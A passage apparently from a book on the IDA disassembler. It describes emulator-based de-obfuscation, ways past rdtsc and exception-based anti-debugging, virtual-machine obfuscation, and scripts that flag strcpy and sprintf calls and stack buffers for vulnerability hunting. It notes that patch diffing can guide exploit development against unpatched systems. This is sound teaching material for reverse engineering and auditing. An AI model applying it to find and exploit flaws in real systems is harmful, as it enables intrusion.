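The idea behind an import address save point can be sketched as a small hook that runs whenever the designated instruction stores a value. Everything here is illustrative: the `make_save_point` helper, the `exports` lookup table, and the `names` dictionary are assumptions standing in for the loaded export information and the database's name list.

```python
def make_save_point(exports, names):
    """Return a hook to call when the save-point instruction stores `value`
    at `dest`. `exports` maps function addresses to names; `names` maps
    database addresses to the labels assigned so far."""
    def on_store(dest, value):
        name = exports.get(value)
        if name is not None:
            names[dest] = name          # label the import table slot
        return name
    return on_store

exports = {0x7C81CDDA: "ExitProcess", 0x7C80C058: "ExitThread"}
names = {}
hook = make_save_point(exports, names)
hook(0x00406270, 0x7C81CDDA)
hook(0x00406274, 0x7C80C058)
hook(0x00406278, 0xDEADBEEF)   # not an exported address: left unnamed
```

Because the hook only fires when the instruction is emulated, it has to be in place before the import reconstruction loop runs.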

Additional x86emu Features

The emulator contains several additional features that you may find

useful. The following list details some of these capabilities.

FileDump This menu option allows the user to specify a range of

database addresses to be dumped to a file. By default, the range extends

from the current cursor location to the maximum virtual address present

in the database.


FileDump Embedded PE Many malware programs contain embedded

executables, which they install on target systems. This menu option looks

for a valid PE file at the current cursor position, parses the file’s headers

to determine the size of the file, and then extracts the bytes from the

database to a saved file.

ViewEnumerate Heap This menu option causes the emulator to dump

a list of allocated heap blocks to the Output window, as shown here:

x86emu: Heap Status ---

0x5378000-0x53781ff (0x200 bytes)

0x5378204-0x5378217 (0x14 bytes)

0x537821c-0x5378347 (0x12c bytes)

EmulateSwitch Thread When emulating within a Windows PE file,

x86emu traps calls to the CreateThread function and allocates additional

resources to manage a new thread. Because the emulator has no sched-

uler of its own, you must use this menu option if you want to switch among

multiple threads.

FunctionsAllocate Heap Block This menu option allows the user to

reserve a block of memory within the emulation heap. The user is asked

for the size of the block to reserve. The address of the newly reserved

block is reported to the user. This feature is useful when scratch space is

required during emulation.

FunctionsAllocate Stack Block This menu option allows the user to

reserve a block of memory within the emulation stack. It behaves in a

manner similar to FunctionsAllocate Heap Block.

x86emu and Anti-debugging

While the emulator is not intended to be used as a debugger, it must simulate a

runtime environment for the program being emulated. In order to success-

fully emulate many obfuscated binaries, the emulator must not fall victim to

active anti-debugging techniques. Several features of the emulator have been

designed with anti-debugging in mind.

One anti-debugging technique measures time intervals, using the x86

rdtsc instruction, to ensure that a program has not been paused by a debugger.

The rdtsc instruction is used to read the value of an internal time stamp counter

(TSC) and returns a 64-bit value representing the number of clock ticks since

the processor was last reset. The rate at which the TSC increments varies

among CPU types but is roughly once per internal CPU clock cycle. Debuggers

cannot stop the TSC from incrementing, and therefore a process can deter-

mine that it has been stopped for an excessive amount of time by measuring

the difference in the TSC between two successive invocations of rdtsc. x86emu

maintains an internal TSC that it increments with each emulated instruction.

Because the emulated TSC is affected only by emulated instructions, it does

not matter how much actual time elapses between uses of rdtsc. In such cases,

the difference in observed values will always be roughly proportional to the


number of instructions that were emulated between invocations of rdtsc and

should always be small enough to convince the emulated program that no

debugger is attached.
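A counter that advances only with emulated instructions is straightforward to model. The class below is a minimal sketch with invented names; it shows how the 64-bit value would be split across edx and eax, as the rdtsc instruction does on real hardware.

```python
class EmulatedTsc:
    """Time stamp counter that advances only when instructions are emulated."""

    def __init__(self, start=0):
        self.value = start

    def tick(self, instructions=1):
        """Advance the counter, wrapping at 64 bits."""
        self.value = (self.value + instructions) & 0xFFFFFFFFFFFFFFFF

    def rdtsc(self, regs):
        """Place the 64-bit counter in edx:eax, as the rdtsc instruction does."""
        regs["eax"] = self.value & 0xFFFFFFFF
        regs["edx"] = self.value >> 32
```

However long the analyst pauses between steps, two emulated rdtsc invocations separated by 25 instructions differ by roughly 25 ticks.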

The intentional use of exceptions is another anti-debugging technique

that must be handled by the emulator. The emulator contains very basic

capabilities to mimic the behavior of the Windows structured exception

handling (SEH) process. When the emulated program is a Windows PE

binary, the emulator responds to an exception or software interrupt by con-

structing an SEH CONTEXT structure, locating the current exception handler

by walking the exception handler list via fs:[0], and transferring control to

the installed exception handler. When the exception handler returns, the

emulator restores the CPU state from the CONTEXT structure (which may have

been manipulated within the exception handler).
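Walking the exception handler list can be sketched as follows. On 32-bit Windows each registration record is a pair of dwords (a pointer to the next record, then the handler address), and the chain ends with the value 0xFFFFFFFF. The flat `mem` buffer, the `teb_base` parameter, and the `limit` guard are assumptions of this sketch.

```python
import struct

END_OF_CHAIN = 0xFFFFFFFF

def walk_seh_chain(mem, teb_base, limit=64):
    """Return the handler addresses registered in the chain at fs:[0].

    `mem` is a flat bytes-like object indexed by address and `teb_base`
    is the address that the fs segment maps to.
    """
    handlers = []
    (record,) = struct.unpack_from("<I", mem, teb_base)   # fs:[0]
    while record != END_OF_CHAIN and len(handlers) < limit:
        next_record, handler = struct.unpack_from("<II", mem, record)
        handlers.append(handler)
        record = next_record
    return handlers
```

The first address in the returned list is the current handler, which is where control would be transferred once the CONTEXT structure has been built.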

Finally, x86emu emulates the behavior of the x86 hardware-debug regis-

ters but does not make use of those registers in order to set breakpoints

within an emulated program. As discussed earlier, the emulator maintains

an internal list of user-specified breakpoints that it scans prior to executing

each instruction. Any manipulation of the debug registers within a Windows

exception handler will not interfere with the operation of the emulator.

Virtual Machine-Based Obfuscation

As mentioned earlier in this chapter (in “Opcode Obfuscation” on page 440),

some of the most sophisticated obfuscators reimplement the program they

receive as input, using a custom byte code and associated virtual machine.

When confronting a binary obfuscated in this manner, the only native code

that you might see would be the virtual machine. Assuming you recognize

that you are looking at a software virtual machine, developing a complete

understanding of all of this code generally fails to reveal the true purpose

of the obfuscated program. This is because the behavior of the program

remains buried in the embedded byte code that the virtual machine must

interpret. To fully understand the program, you must, first, locate all of the

embedded byte code and, second, reverse engineer the instruction set of the

virtual machine so you can properly interpret the meaning of that byte code.

By way of comparison, imagine that you knew nothing whatsoever about

Java, and someone handed you a Java virtual machine and a .class file con-

taining compiled byte code and asked you what they did. Lacking any docu-

mentation, you could make little sense of the byte code file, and you would

need to fully reverse the virtual machine to learn both the structure of a

.class file and how to interpret its contents. With an understanding of the

byte code machine language, you could then proceed to understanding the

.class file.
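To make the point concrete, here is a toy byte code disassembler in Python. The two-byte instruction format and the opcode table are entirely invented; the sketch only illustrates that raw byte code is meaningless until the virtual machine's opcode assignments have been recovered.

```python
# Hypothetical byte code format: one opcode byte followed by one operand byte.
OPCODES = {0x10: "push", 0x11: "pop", 0x20: "add", 0xFF: "halt"}

def disassemble(code):
    """Yield (offset, text) pairs; unknown opcodes are shown as raw bytes."""
    for offset in range(0, len(code) - 1, 2):
        opcode, operand = code[offset], code[offset + 1]
        mnemonic = OPCODES.get(opcode)
        if mnemonic is None:
            yield offset, f"db {opcode:#04x}, {operand:#04x}"
        else:
            yield offset, f"{mnemonic} {operand:#04x}"

listing = list(disassemble(bytes([0x10, 0x05, 0x20, 0x01, 0x77, 0x00])))
```

With an empty `OPCODES` table every line degrades to raw `db` output, which is roughly the position an analyst is in before reversing the virtual machine.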

VMProtect is an example of a commercial product that utilizes very

sophisticated virtual machine-based obfuscation techniques. As more of an

academic exercise, TheHyper’s HyperUnpackMe2 challenge binary is a fairly

straightforward example of the use of virtual machines in obfuscation, the

primary challenge being to locate the virtual machine’s embedded byte code

program and determine the meaning of each byte code. In his article on

OpenRCE describing HyperUnpackMe2,36 Rolf Rolles took the approach of

fully comprehending the virtual machine in order to build a processor module

capable of disassembling its byte code. The processor module then allowed

him to disassemble the byte code embedded within the challenge binary. A

minor limitation to this approach is that it allows you to view either the x86

code within HyperUnpackMe2 (using IDA’s x86 module) or the virtual

machine code (using Rolles’s processor module) but not both at the same

time. This obligates you to create two different databases, each using a differ-

ent processor module. An alternative approach takes advantage of the ability

to customize existing processor modules (see “Customizing Existing Proces-

sors” on page 407) through the use of plug-ins, effectively allowing you to

extend an instruction set to include all of the instructions of an embedded

virtual machine. Applying this approach to HyperUnpackMe2 allows us to

view x86 code and virtual machine code together in a single database, as

shown in the following listing:

➊ TheHyper:01013B2F                 h_pop.l R9
  TheHyper:01013B32                 h_pop.l R7
  TheHyper:01013B35                 h_pop.l R5
  TheHyper:01013B38                 h_mov.l SP, R2
  TheHyper:01013B3C                 h_sub.l SP, 0Ch
  TheHyper:01013B44                 h_pop.l R2
  TheHyper:01013B47                 h_pop.l R1
  TheHyper:01013B4A                 h_retn 0Ch
  TheHyper:01013B4A sub_1013919     endp
  TheHyper:01013B4A
  TheHyper:01013B4A ; ----------------------------------------------------------
  TheHyper:01013B4D                 dd 24242424h
  TheHyper:01013B51                 dd 0A9A4285Dh ; TAG VALUE
  TheHyper:01013B55
  TheHyper:01013B55 ; ============ S U B R O U T I N E =========================
  TheHyper:01013B55
  TheHyper:01013B55 ; Attributes: bp-based frame
  TheHyper:01013B55
  TheHyper:01013B55 sub_1013B55     proc near ; DATA XREF: TheHyper:0103AF7A↓o
  TheHyper:01013B55
  TheHyper:01013B55 var_8           = dword ptr -8
  TheHyper:01013B55 var_4           = dword ptr -4
  TheHyper:01013B55 arg_0           = dword ptr 8
  TheHyper:01013B55 arg_4           = dword ptr 0Ch
  TheHyper:01013B55
➋ TheHyper:01013B55                 push ebp
  TheHyper:01013B56                 mov ebp, esp
  TheHyper:01013B58                 sub esp, 8
  TheHyper:01013B5B                 mov eax, [ebp+arg_0]
  TheHyper:01013B5E                 mov [esp+8+var_8], eax
  TheHyper:01013B61                 mov [esp+8+var_4], 0
  TheHyper:01013B69                 push 4
  TheHyper:01013B6B                 push 1000h

Here, the code beginning at ➊ is disassembled as HyperUnpackMe2 byte
code, while the code that follows at ➋ is displayed as x86 code.

36. See “Defeating HyperUnpackMe2 With an IDA Processor Module” at http://www.openrce.org/articles/full_view/28.

The ability to simultaneously display native code and byte code has been

anticipated by Hex-Rays, which introduced custom datatypes and formats in

IDA 5.7. Custom data formats are useful when IDA’s built-in formatting

options fail to meet your needs. New formatting capabilities are registered

by specifying (using a script or plug-in) a menu name for your format and a

function to perform the formatting. Once you select a custom format for a

data item, IDA will invoke your formatting function each time it needs to

display that data item. Custom datatypes are useful when IDA’s built-in

datatypes are not expressive enough to represent the data that you encounter

in a particular binary. Custom datatypes, like custom formats, are registered

using a script or a plug-in. The Hex-Rays example registers a custom data

type to designate virtual machine byte code and displays each byte code as

an instruction by using a custom data format. A drawback to this approach is

that it requires you to locate every virtual machine instruction and explicitly

change its data type. Using a custom processor extension, designating a sin-

gle value as a virtual machine instruction automatically leads to the discovery

of every reachable instruction, because IDA drives the disassembly process

and the processor extension discovers new reachable instructions via its

custom_emu implementation.
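The difference between the two approaches comes down to who discovers the instructions. As a rough illustration only, the following Python sketch performs recursive-descent discovery over a made-up byte code, starting from a single designated instruction. The opcodes, their lengths, the sample program, and the function name discover are all invented for this example; they have nothing to do with HyperUnpackMe2's actual instruction set or with IDA's SDK.

```python
# Hypothetical byte code: opcode -> (mnemonic, total length, kind).
OPCODES = {
    0x01: ("push", 2, "flow"),    # push imm8, then fall through
    0x02: ("pop", 1, "flow"),     # pop, then fall through
    0x03: ("jmp", 2, "jump"),     # unconditional jump to abs8
    0x04: ("jz", 2, "branch"),    # conditional jump to abs8
    0x05: ("ret", 1, "stop"),     # no successors
}

def discover(code, entry):
    """Return the sorted offsets of every instruction reachable from entry."""
    seen = set()
    worklist = [entry]
    while worklist:
        pc = worklist.pop()
        if pc in seen or not 0 <= pc < len(code):
            continue
        if code[pc] not in OPCODES:
            continue                      # not an instruction; leave as data
        _, length, kind = OPCODES[code[pc]]
        if pc + length > len(code):
            continue                      # truncated instruction
        seen.add(pc)
        if kind in ("jump", "branch"):
            worklist.append(code[pc + 1])  # follow the branch target
        if kind in ("flow", "branch"):
            worklist.append(pc + length)   # follow the fall-through path
    return sorted(seen)

program = bytes([
    0x01, 0x2A,   # 0: push 2Ah
    0x04, 0x07,   # 2: jz 7
    0x02,         # 4: pop
    0x05,         # 5: ret
    0xFF,         # 6: data byte that no path reaches
    0x02,         # 7: pop
    0x03, 0x05,   # 8: jmp 5
])
reachable = discover(program, 0)
```

Marking offset 0 as an instruction is enough to find the rest of the program, while the byte at offset 6 is never touched. With the custom-datatype approach, each of those offsets would have to be typed by hand.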

Summary

Obfuscated programs are the rule rather than the exception when it comes

to malware these days. Any attempts to study the internal operations of a

malware sample are almost certain to require some type of de-obfuscation.

Whether you take a debugger-assisted, dynamic approach to de-obfuscation

or whether you prefer not to run potentially malicious code and instead use

scripts or emulation to de-obfuscate your binaries, the ultimate goal is to pro-

duce a de-obfuscated binary that can be fully disassembled and properly ana-

lyzed. In most cases, this final analysis will be performed using a tool such as

IDA. Given this ultimate goal (of using IDA for analysis), it makes some sense

to attempt to use IDA from start to finish. The techniques presented in this

chapter are intended to demonstrate that IDA is capable of far more than

generating disassembly listings. In Chapter 25 we will revisit obfuscated code

and take a look at how IDA’s debugging features may be leveraged as a de-

obfuscation tool as well.


VULNERABILITY ANALYSIS

Before we get too far into this chapter, we

need to make one thing clear: IDA is not a

vulnerability discovery tool. There, we said it;

what a relief! IDA seems to have attained mysti-

cal qualities in some people’s minds. All too often peo-

ple seem to have the impression that merely opening a

binary with IDA will reveal all the secrets of the universe, that the behavior of

a piece of malware will be fully explained to them in comments automatically

generated by IDA, that vulnerabilities will be highlighted in red, and that IDA

will automatically generate exploit code if you right-click while standing on

one foot in some obscure Easter egg–activation sequence.

While IDA is certainly a very capable tool, without a clever user sitting at

the keyboard (and perhaps a handy collection of scripts and plug-ins), it is

really only a disassembler/debugger. As a static-analysis tool, it can only facil-

itate your attempts to locate software vulnerabilities. Ultimately, it is up to

your skills and how you apply them as to whether IDA makes your search for

vulnerabilities easier. Based on our experience, IDA is not the optimal tool


for locating new vulnerabilities,1 but when used in conjunction with a debug-

ger, it is one of the best tools available for assisting in exploit development

once a vulnerability has been discovered.

Over the past several years, IDA has taken on a new role in discovering

existing vulnerabilities. Initially, it may seem unusual to search for known vul-

nerabilities until we stop to consider exactly what is known about these

vulnerabilities and exactly who knows it. In the closed-source, binary-only

software world, vendors frequently release software patches without dis-

closing exactly what has been patched and why. By performing differential

analysis between new patched versions of a piece of software and old

unpatched versions of the same software, it is possible to isolate the areas

that have changed within a binary. Under the assumption that these changes

were made for a reason, such differential-analysis techniques actually help

to shine a spotlight on what were formerly vulnerable code sequences. With

the search thus narrowed, anyone with the requisite skills can develop an

exploit for use against unpatched systems. In fact, given Microsoft’s well-

known Patch Tuesday cycle of publishing updates, large numbers of security

researchers prepare to sit down and do just that once every month.

Considering that entire books exist on the topic,2 there is no way that we

can do justice to vulnerability analysis in a single chapter in a book dedicated

to IDA. What we will do is assume that the reader is familiar with some of the

basic concepts of software vulnerabilities, such as buffer overflows, and dis-

cuss some of the ways that IDA may be used to hunt down, analyze, and ulti-

mately develop exploits for those vulnerabilities.

Discovering New Vulnerabilities with IDA

Vulnerability researchers take many different approaches to discovering new

vulnerabilities in software. When source code is available, it may be possible to

utilize any of a growing number of automated source code–auditing tools

to highlight potential problem areas within a program. In many cases, such

automated tools will only point out the low-hanging fruit, while discovery of

deeper vulnerabilities may require extensive manual auditing.

Tools for performing automated auditing of binaries offer many of the

same reporting capabilities offered by automated source-auditing tools. A

clear advantage of automated binary analysis is that no access to the applica-

tion source code is required. Therefore, it is possible to perform automated

analysis of closed-source, binary-only programs. Veracode3 is an example of a

company that offers a subscription-based service in which users may submit

binary files for analysis by Veracode’s proprietary binary-analysis tools. While

there is no guarantee that such tools can find any or all vulnerabilities within

1. In general, far more vulnerabilities are discovered through fuzz testing than through static

analysis.

2. For example, see Jon Erickson’s Hacking: The Art of Exploitation, 2nd Edition (http://nostarch

.com/hacking2.htm).

3. See http://www.veracode.com/.


a binary, these technologies bring binary analysis within reach of the average

person seeking some measure of confidence that the software she uses is free

from vulnerabilities.

Whether auditing at the source or binary level, basic static-analysis tech-

niques include auditing for the use of problematic functions such as strcpy and

sprintf, auditing the use of buffers returned by dynamic memory-allocation

routines such as malloc and VirtualAlloc, and auditing the handling of user-

supplied input received via functions such as recv, read, fgets, and many

other similar functions. Locating such calls within a database is not difficult.

For example, to track down all calls to strcpy, we could perform the following

steps:

1. Find the strcpy function.

2. Display all cross-references to the strcpy function by positioning the cursor
on the strcpy label and then choosing View▸Open Subviews▸Cross References.

3. Visit each cross-reference and analyze the parameters provided to strcpy

to determine whether a buffer overflow may be possible.

Step 3 may require a substantial amount of code and data-flow analysis

to understand all potential inputs to the function call. Hopefully, the com-

plexity of such a task is clear. Step 1, although it seems straightforward, may

require a little effort on your part. Locating strcpy may be as easy as using the

JumpJump to Address command (G) and entering strcpy as the address to

jump to. In Windows PE binaries or statically linked ELF binaries, this is usually

all that is needed. However, with other binaries, extra steps may be required.

In a dynamically linked ELF binary, using the Jump command may not take

you directly to the desired function. Instead, it is likely to take you to an entry

in the extern section (which is involved in the dynamic-linking process). An

IDA representation of the strcpy entry in an extern section is shown here:

➊ extern:804DECC    extrn strcpy:near    ; CODE XREF: _strcpy↑j
  extern:804DECC                         ; DATA XREF: .got:off_804D5E4↑o

To confuse matters, this location does not appear to be named strcpy
at all (it is, but the name is indented), and the only code cross-reference ➊
to the location is a jump cross-reference from a function that appears to be
named _strcpy, while a data cross-reference is also made to this location from
the .got section. The referencing function is actually named .strcpy, which
is not at all obvious from the display. In this case, IDA has replaced the dot
character with an underscore because IDA does not consider dots to be valid


identifier characters by default. Double-clicking the code cross-reference

takes us to the program’s procedure linkage table (.plt) entry for strcpy, as

shown here:

.plt:08049E90 _strcpy    proc near    ; CODE XREF: decode+5F↓p
.plt:08049E90                         ; extract_int_argument+24↓p ...
.plt:08049E90            jmp ds:off_804D5E4
.plt:08049E90 _strcpy    endp

If instead we follow the data cross-reference, we end up at the corre-

sponding .got entry for strcpy shown here:

.got:0804D5E4 off_804D5E4    dd offset strcpy    ; DATA XREF: _strcpy↑r

In the .got entry, we encounter another data cross-reference to the

.strcpy function in the .plt section. In practice, following the data cross-

references is the most reliable means of navigating from the extern section

to the .plt section. In dynamically linked ELF binaries, functions are called

indirectly through the procedure linkage table. Now that we have reached

the .plt, we can bring up the cross-references to _strcpy (actually .strcpy)

and begin to audit each call (of which there are at least two in this example).

This process can become tedious when we have a list of several common

functions whose calls we wish to locate and audit. At this point it may be use-

ful to develop a script that can automatically locate and comment all interest-

ing function calls for us. With comments in place, we can perform simple

searches to move from one audit location to another. The foundation for

such a script is a function that can reliably locate another function so that

we can locate all cross-references to that function. With the understanding

of ELF binaries gained in the preceding discussion, the IDC function in List-

ing 22-1 takes a function name as an input argument and returns an address

suitable for cross-reference iteration.

static getFuncAddr(fname) {
   auto func = LocByName(fname);
   if (func != BADADDR) {
      auto seg = SegName(func);
      //what segment did we find it in?
      if (seg == "extern") { //Likely an ELF if we are in "extern"
         //First (and only) data xref should be from got
         func = DfirstB(func);
         if (func != BADADDR) {
            seg = SegName(func);
            if (seg != ".got") return BADADDR;
            //Now, first (and only) data xref should be from plt
            func = DfirstB(func);
            if (func != BADADDR) {
               seg = SegName(func);
               if (seg != ".plt") return BADADDR;
            }
         }
      }
      else if (seg != ".text") {
         //otherwise, if the name was not in the .text section, then we
         // don't have an algorithm for finding it automatically
         func = BADADDR;
      }
   }
   return func;
}

Listing 22-1: Finding a function’s callable address
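To make the extern-to-.got-to-.plt walk easier to follow outside of IDA, the sketch below replays the same logic in plain Python against a tiny hand-built model of the database. The dictionaries stand in for IDA's name, segment, and cross-reference lookups and are assumptions made for this example; only the three addresses come from the listings above. It is not a replacement for the IDC function.

```python
BADADDR = -1

# Toy stand-ins for the IDA database, using the addresses shown earlier.
names = {"strcpy": 0x804DECC}                      # name -> address
segments = {0x804DECC: "extern",                   # address -> segment name
            0x804D5E4: ".got",
            0x8049E90: ".plt"}
# data_xrefs_to[target] lists the addresses that hold a data reference to target
data_xrefs_to = {0x804DECC: [0x804D5E4],
                 0x804D5E4: [0x8049E90]}

def first_data_xref_to(addr):
    """Rough analogue of DfirstB: first data reference to addr, or BADADDR."""
    refs = data_xrefs_to.get(addr, [])
    return refs[0] if refs else BADADDR

def get_func_addr(fname):
    """Return an address suitable for cross-reference iteration, or BADADDR."""
    func = names.get(fname, BADADDR)
    if func == BADADDR:
        return BADADDR
    seg = segments.get(func)
    if seg == "extern":
        # Walk extern -> .got -> .plt, insisting on the expected segment
        # at each hop.
        for expected in (".got", ".plt"):
            func = first_data_xref_to(func)
            if func == BADADDR or segments.get(func) != expected:
                return BADADDR
    elif seg != ".text":
        return BADADDR       # no algorithm for names found anywhere else
    return func

plt_entry = get_func_addr("strcpy")
```

For the sample data, the walk ends at 0x8049E90, the .plt stub whose callers are the locations worth auditing.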

Using the address that getFuncAddr returns, it is now possible to track down all of

the references to any function whose use we want to audit. The IDC function

in Listing 22-2 leverages the getFuncAddr function from the preceding exam-

ple to obtain a function address and add comments at all calls to the function.

static flagCalls(fname) {
   auto func, xref;
   //get the callable address of the named function
   func = getFuncAddr(fname);                                              //➊
   if (func != BADADDR) {
      //Iterate through calls to the named function, and add a comment
      //at each call
      for (xref = RfirstB(func); xref != BADADDR; xref = RnextB(func, xref)) {   //➋
         if (XrefType() == fl_CN || XrefType() == fl_CF) {
            MakeComm(xref, "*** AUDIT HERE ***");
         }
      }
      //Iterate through data references to the named function, and add a
      //comment at reference
      for (xref = DfirstB(func); xref != BADADDR; xref = DnextB(func, xref)) {   //➌
         if (XrefType() == dr_O) {
            MakeComm(xref, "*** AUDIT HERE ***");
         }
      }
   }
}

Listing 22-2: Flagging calls to a designated function

Once the desired function’s address has been located ➊, two loops are
used to iterate over cross-references to the function. In the first loop ➋, a
comment is inserted at each location that calls the function of interest. In the
second loop ➌, additional comments are inserted at each location that takes
the address of the function (use of an offset cross-reference type). The second
loop is required in order to track down calls of the following style:

➊ .text:000194EA    mov esi, ds:strcpy
  .text:000194F0    push offset loc_40A006
  .text:000194F5    add edi, 160h
  .text:000194FB    push edi
➋ .text:000194FC    call esi

In this example, the compiler has cached the address of the strcpy function
in the ESI register ➊ in order to make use of a faster means of calling
strcpy later ➋ in the program. The call instruction shown here is faster to
execute because it is both smaller (2 bytes) and requires no additional
operations to resolve the target of the call, since the address is already held
in the ESI register. A compiler may choose to generate
this type of code when one function makes several calls to another function.

Given the indirect nature of the call in this example, the flagCalls function
in our example may see only the data cross-reference to strcpy ➊ while
failing to see the call to strcpy ➋ because the call instruction does not
reference strcpy directly. In practice, however, IDA possesses the capability to
perform some limited data-flow analysis in cases such as these and is likely to
generate the disassembly shown here:

  .text:000194EA    mov esi, ds:strcpy
  .text:000194F0    push offset loc_40A006
  .text:000194F5    add edi, 160h
  .text:000194FB    push edi
➊ .text:000194FC    call esi ; strcpy

Note that the call instruction ➊ has been annotated with a comment
indicating which function IDA believes is being called. In addition to inserting the

comment, IDA adds a code cross-reference from the point of the call to the

function being called. This benefits the flagCalls function, because in this case

the call instruction will be found and annotated via a code cross-reference.
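The idea behind this kind of limited data-flow analysis can be approximated in a few lines. The following sketch is not IDA's algorithm; it is a deliberately naive, straight-line tracker that works on disassembly text, remembers which imported symbol was last loaded into each register, and resolves any call made through such a register. The function name resolve_indirect_calls and the small list of register-modifying mnemonics are assumptions made for the example, and branches are ignored entirely.

```python
import re

def resolve_indirect_calls(lines):
    """Map the address of each 'call <reg>' to the symbol held in <reg>."""
    regs = {}        # register -> symbol it currently holds
    resolved = {}    # call address -> symbol
    for line in lines:
        addr, mnem, *rest = line.split(None, 2)
        ops = [o.strip() for o in rest[0].split(",")] if rest else []
        if mnem == "mov" and len(ops) == 2:
            m = re.fullmatch(r"ds:(\w+)", ops[1])
            if m:
                regs[ops[0]] = m.group(1)     # register now holds a symbol
            else:
                regs.pop(ops[0], None)        # overwritten with something else
        elif mnem == "call" and ops and ops[0] in regs:
            resolved[addr] = regs[ops[0]]
        elif mnem in ("add", "sub", "xor", "lea", "pop") and ops:
            regs.pop(ops[0], None)            # destination register was modified
    return resolved

listing = [
    ".text:000194EA mov esi, ds:strcpy",
    ".text:000194F0 push offset loc_40A006",
    ".text:000194F5 add edi, 160h",
    ".text:000194FB push edi",
    ".text:000194FC call esi",
]
calls = resolve_indirect_calls(listing)
```

Applied to the listing above, the tracker associates the call at .text:000194FC with strcpy, which is the same conclusion that IDA records as a comment and a code cross-reference.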

To finish up our example script, we need a main function that invokes

flagCalls for all of the functions that we are interested in auditing. A simple

example to annotate calls to some of the functions mentioned earlier in this

section is shown here:

static main() {

flagCalls("strcpy");

flagCalls("strcat");

flagCalls("sprintf");

flagCalls("gets");

}

After running this script, we can move from one interesting call to the

next by searching for the inserted comment text, *** AUDIT HERE ***. Of course

this still leaves a lot of work to be done from an analysis perspective, since the

mere fact that a program calls strcpy does not make that program exploit-

able. This is where data-flow analysis comes into play. In order to understand

whether a particular call to strcpy is exploitable or not, you must determine

what parameters are being passed in to strcpy and evaluate whether those

parameters can be manipulated to your advantage or not.


Data-flow analysis is a far more complex task than simply finding calls

to problem functions. In order to track the flow of data in a static-analysis

environment, a thorough understanding of the instruction set being used is

required. Your static-analysis tools need to understand where registers may

have been assigned values and how those values may have changed and prop-

agated to other registers. Further, your tools need a means for determining

the sizes of source and destination buffers being referenced within the pro-

gram, which in turn requires the ability to understand the layout of stack

frames and global variables as well as the ability to deduce the size of dynam-

ically allocated memory blocks. And, of course, all of this is being attempted

without actually running the program.

An interesting example of what can be accomplished with creative script-

ing comes in the form of the BugScam4 scripts created by Halvar Flake. Bug-

Scam utilizes techniques similar to the preceding examples to locate calls to

problematic functions and takes the additional step of performing rudimen-

tary data-flow analysis at each function call. The result of BugScam’s analysis

is an HTML report of potential problems in a binary. A sample report table

generated as a result of a sprintf analysis is shown here:

Address  Severity  Description
-------  --------  -----------
8048c03  5         The maximum expansion of the data appears to be larger than the
                   target buffer; this might be the cause of a buffer overrun! Maximum
                   Expansion: 1053. Target Size: 1036.

In this case, BugScam was able to determine the size of the input and
output buffers, which, when combined with the format specifiers contained
in the format string, were used to determine the maximum size of the
generated output.

4. See http://www.sourceforge.net/projects/bugscam/.

Developing scripts of this nature requires an in-depth understanding of
various exploit classes in order to develop an algorithm that can be applied
generically across a large body of binaries. Lacking such knowledge, we can
still develop scripts (or plug-ins) that answer simple questions for us faster
than we can find the answers manually.

As a final example, consider the task of locating all functions that contain
stack-allocated buffers, since these are the functions that might be susceptible
to stack-based buffer-overflow attacks. Rather than manually scrolling
through a database, we can develop a script to analyze the stack frame of
each function, looking for variables that occupy large amounts of space. The
Python function in Listing 22-3 iterates through the defined members of a
given function’s stack frame in search of variables whose size is larger than a
specified minimum size.

def findStackBuffers(func_addr, minsize):
   prev_idx = -1
   frame = GetFrame(func_addr)
   if frame is None or frame == -1: return  #bad function
   idx = 0
   prev = None
   while idx < GetStrucSize(frame):
      member = GetMemberName(frame, idx)                        # ➊
      if member is not None:
         if prev_idx != -1:
            #compute distance from previous field to current field
            delta = idx - prev_idx                              # ➋
            if delta >= minsize:                                # ➌
               Message("%s: possible buffer %s: %d bytes\n" % \
                       (GetFunctionName(func_addr), prev, delta))
         prev_idx = idx
         prev = member
         idx = idx + GetMemberSize(frame, idx)                  # ➎
      else:
         idx = idx + 1                                          # ➍

Listing 22-3: Scanning for stack-allocated buffers

This function locates all the variables in a stack frame using repeated
calls to GetMemberName ➊ for all valid offsets within the stack frame. The size
of a variable is computed as the difference between the starting offsets of two
successive variables ➋. If the size is at least the threshold size (minsize) ➌, then
the variable is reported as a possible stack buffer. The index into the structure
is moved along by either 1 byte ➍ when no member is defined at the
current offset or by the size of any member found at the current offset ➎. The

GetMemberSize function may seem like a more suitable choice for computing

the size of each stack variable; however, this is true only if the variable has

been sized properly by either IDA or the user. Consider the following stack

frame:

.text:08048B38 sub_8048B38 proc near

.text:08048B38

.text:08048B38 var_818 = byte ptr -818h

.text:08048B38 var_418 = byte ptr -418h

.text:08048B38 var_C = dword ptr -0Ch

.text:08048B38 arg_0 = dword ptr 8

Using the displayed byte offsets, we can compute that there are 1,024 bytes

from the start of var_818 to the start of var_418 (818h - 418h = 400h) and

1,036 bytes between the start of var_418 and the start of var_C (418h - 0Ch = 40Ch).

However, the stack frame might be expanded to show the following layout:

-00000818 var_818 db ?

-00000817 db ? ; undefined

-00000816 db ? ; undefined

...

-0000041A db ? ; undefined

-00000419 db ? ; undefined

-00000418 var_418 db 1036 dup(?)

-0000000C var_C dd ?


Here, var_418 has been collapsed into an array, while var_818 appears to

be only a single byte (with 1,023 undefined bytes filling the space between

var_818 and var_418). For this stack layout, GetMemberSize will report 1 byte

for var_818 and 1,036 bytes for var_418, which understates the space available
to var_818. A call to findStackBuffers(0x08048B38, 16), by contrast, produces
the following output regardless of whether var_818 is defined as a single byte
or an array of 1,024 bytes:

sub_8048B38: possible buffer var_818: 1024 bytes

sub_8048B38: possible buffer var_418: 1036 bytes
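To experiment with the offset-difference idea outside of IDA, the following sketch replaces the IDA calls with a plain dictionary that maps each member's starting offset within the frame to its name and declared size. The variable offsets are taken from the example frame above; the saved-register and return-address slots (shown as " s" and " r"), the total frame size, and the name find_stack_buffers are assumptions made for this illustration.

```python
def find_stack_buffers(members, frame_size, minsize):
    """Report (name, size) for members followed by at least minsize bytes.

    members maps a starting offset to (name, declared_size); the size of a
    variable is measured as the distance to the next defined member.
    """
    results = []
    prev_idx, prev, idx = -1, None, 0
    while idx < frame_size:
        member = members.get(idx)
        if member is not None:
            name, declared_size = member
            if prev_idx != -1:
                delta = idx - prev_idx        # distance from previous member
                if delta >= minsize:
                    results.append((prev, delta))
            prev_idx, prev = idx, name
            idx += declared_size              # skip over the defined member
        else:
            idx += 1                          # undefined byte, keep scanning
    return results

# Frame offsets are relative to the lowest address in the frame (var_818).
frame = {
    0x000: ("var_818", 1),      # left as a single byte
    0x400: ("var_418", 1036),   # collapsed into an array
    0x80C: ("var_C", 4),
    0x818: (" s", 4),           # assumed saved-register slot
    0x81C: (" r", 4),           # assumed return-address slot
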